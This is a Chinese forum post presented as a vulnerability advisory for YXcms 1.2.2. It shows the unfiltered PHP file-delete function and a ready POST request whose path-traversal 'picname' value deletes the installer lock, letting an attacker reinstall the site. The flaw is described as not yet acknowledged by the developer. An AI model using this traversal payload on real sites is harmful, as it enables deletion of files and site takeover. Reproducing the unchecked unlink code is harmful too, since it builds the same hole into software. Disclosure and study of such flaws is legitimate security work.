切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
YXcms最新版(YXcmsApp1.2.2)任意文件删除漏洞,可重装[ CodeSec-2014-0005 ][复制链接]
发表于 2014-4-3 22:07:21 | 显示全部楼层 |!read_mode!

开发者漏洞预警 —— YXcms最新版(YXcmsApp1.2.2)任意文件删除漏洞,可重装 [ CodeSec-2014-0005 ]

漏洞编号: CodeSec-2014-0005

漏洞标题: YXcms最新版(YXcmsApp1.2.2)任意文件删除漏洞,可重装

漏洞类型: 任意文件删除

漏洞危害等级: 中等

漏洞状态: 漏洞发布,联系作者中...

漏洞细节:
见帖子内容

修补方案:
过滤

源码地址:
http://www.yxcms.net/

论坛备份源码地址:
http://pan.baidu.com/s/1pJ0PlQN

开发者回复: 暂无

漏洞文件


漏洞代码
        //单图删除,ajax方式使用
        public function delpic()
        {
                if(empty($_POST['picname'])) $this->error('参数错误~');
                $picname=$_POST['picname'];
                $path=$this->uploadpath;
                if(file_exists($path.$picname))
                  @unlink($path.$picname);
                else{echo '图片不存在~';return;} 
                if(file_exists($path.'thumb_'.$picname))
                   @unlink($path.'thumb_'.$picname);
                else {echo '缩略图不存在~';return;}
                echo '原图以及缩略图删除成功~';
        }


直接删除,未做任何判断或过滤

利用方法
posturl:
http://yxcms.me/index.php?r=install/index/index
postdata:
picname=../../protected/apps/install/install.lock


然后直接访问首页可重装



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
已有 1 人评分金币 收起 理由
店小二01 + 100

总评分: 金币 + 100   查看全部评分

发表于 2014-4-5 23:11:42 | 显示全部楼层
我都不知道这个程序。。。
发表于 2014-4-6 00:09:09 | 显示全部楼层
你不知道的程序多了。。。。

代码区

GMT+8, 2019-11-17 19:11

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部